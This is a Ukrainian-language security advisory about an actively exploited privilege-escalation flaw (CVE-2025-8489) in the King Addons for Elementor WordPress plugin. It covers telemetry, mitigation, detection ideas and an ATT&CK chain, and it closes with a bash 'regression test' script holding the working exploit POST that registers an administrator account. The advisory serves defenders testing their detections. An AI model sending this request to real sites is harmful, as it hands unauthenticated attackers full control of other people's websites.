Критична уразливість King Addons для Elementor під активною експлуатацією
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Критична неаутентифікована вразливість підвищення привілеїв (CVE-2025-8489) у плагіні King Addons для Elementor WordPress дозволяє атакам реєструвати нових користувачів з привілегіями адміністратора. Ця вразливість активно експлуатується з 31 жовтня 2025 року, причому Wordfence блокує десятки тисяч спроб. Зловмисники експлуатують цю проблематику через спеціально сформовані POST-запити, що надсилаються до кінцевої точки admin-ajax.php. Версії від 24.12.92 до 51.1.14 зазнали впливу, але виправлення доступне у версії 51.1.35.
Розслідування
Телеметрія Wordfence зареєструвала понад 48 400 спроб експлуатації, з помітним зростанням кількості спроб 9–10 листопада 2025 року. Найбільш активна IPv6 адреса джерела – 2602:fa59:3:424::1. Шкідливі навантаження використовують дані HTTP POST, що встановлюють параметр user_role до administrator під час робочого процесу реєстрації. Жодного додаткового впровадження шкідливого програмного забезпечення не спостерігалося, крім створення підроблених облікових записів адміністратора.
Зменшення загрози
Оновіть King Addons для Elementor до версії 51.1.35 або новішої. Увімкніть захисти брандмауера Wordfence, які надійшли 4 серпня 2025 року (преміум) і 3 вересня 2025 року (безкоштовно). Аудитуйте списки користувачів WordPress на наявність несподіваних облікових записів адміністратора і постійно переглядайте журнали на наявність підозрілих шаблонів POST.
Реакція
Запускайте оповіщення про трафік POST до /wp-admin/admin-ajax.php, яке включає user_role=administrator. Блокуйте зловмисні IP-адреси, приділяючи особливу увагу виділеному IPv6 джерелу. Проводьте перевірки гігієни облікових записів і видаляйте несанкціонованих адміністраторів. Розгорніть сигнатури IDS на хостах, налаштовані на спостережену структуру запиту.
graph TB %% Визначення класів classDef technique fill:#ffcc00 %% Визначення вузлів tech_exploit_public_facing[“<b>Техніка</b> – <b>T1190 Експлуатація публічно доступного застосунку</b><br/>Зловмисники експлуатують публічно доступний застосунок для отримання початкового доступу.”] class tech_exploit_public_facing technique tech_exploitation_priv_esc[“<b>Техніка</b> – <b>T1068 Експлуатація для підвищення привілеїв</b><br/>Зловмисники використовують вразливість програмного забезпечення для підвищення своїх привілеїв у системі.”] class tech_exploitation_priv_esc technique tech_account_manipulation[“<b>Техніка</b> – <b>T1098 Маніпуляція обліковими записами</b><br/>Зловмисники створюють, змінюють або видаляють облікові записи для досягнення своїх цілей.”] class tech_account_manipulation technique tech_valid_accounts[“<b>Техніка</b> – <b>T1078 Дійсні облікові записи</b><br/>Зловмисники отримують і використовують легітимні облікові дані для доступу до облікових записів.”] class tech_valid_accounts technique %% Зв’язки, що показують ланцюг атаки tech_exploit_public_facing –>|призводить до| tech_exploitation_priv_esc tech_exploitation_priv_esc –>|призводить до| tech_account_manipulation tech_account_manipulation –>|призводить до| tech_valid_accounts
Потік атаки
Виявлення
Експлуатація підвищення привілеїв у King Addons для Elementor [Веб-сервери]
Перегляд
IOC (SourceIP), що виявляють: Активні атаки на критичну вразливість в плагіні King Addons для Elementor
Перегляд
IOC (DestinationIP), що виявляють: Активні атаки на критичну вразливість в плагіні King Addons для Elementor
Перегляд
Можлива спроба експлуатації CVE-2025-8489 (Підвищення привілеїв у WordPress King Addons) (через веб-сервер)
Перегляд
Виконання симуляції
Попередня умова: Телеметрія та первірка базового рівня повинні бути пройдені.
-
Опис атаки та команди:
Противник виявляє CVE-2025-8489 у плагіні King Addons для Elementor. Вони формують POST-запит доadmin-ajax.phpщо включає параметрaction=king_addons_user_registerнеобхідний для плагінаandпримуще роль нового користувача доадміністраторчерезuser_role=administrator. Надіславши цей запит безпосередньо до вразливої кінцевої точки, атакувач отримує привілейований обліковий запис WordPress без необхідності попередньої аутентифікації. Навантаження закодоване за допомогою URL для імітації реалістичного веб-клієнта. -
Скрипт регресивного тестування:
#!/usr/bin/env bash # Скрипт експлуатації для підвищення привілеїв у King Addons для Elementor (CVE‑2025‑8489) TARGET="http://webserver.example.com" ENDPOINT="/wp-admin/admin-ajax.php" # Спеціально підготовлені дані POST (URL‑encoded) POST_DATA="action=king_addons_user_register&user_login=eviladmin&user_email=evil@example.com&user_pass=P@ssw0rd!&user_role=administrator" echo "[*] Відправлення шкідливого навантаження..." curl -s -o /dev/null -w "%{http_code}" -X POST "${TARGET}${ENDPOINT}" -H "Content-Type: application/x-www-form-urlencoded" --data "${POST_DATA}" echo -e "n[+] Експлуатація відправлена. Перевірте SIEM для згенерованого оповіщення." -
Команди очищення:
# Видалити зловмисного користувача, створеного під час тесту curl -X POST "http://webserver.example.com/wp-admin/admin-ajax.php" -d "action=delete_user&user_id=$(curl -s "http://webserver.example.com/wp-json/wp/v2/users?search=eviladmin" | jq -r '.[0].id')" echo "[*] Очищено."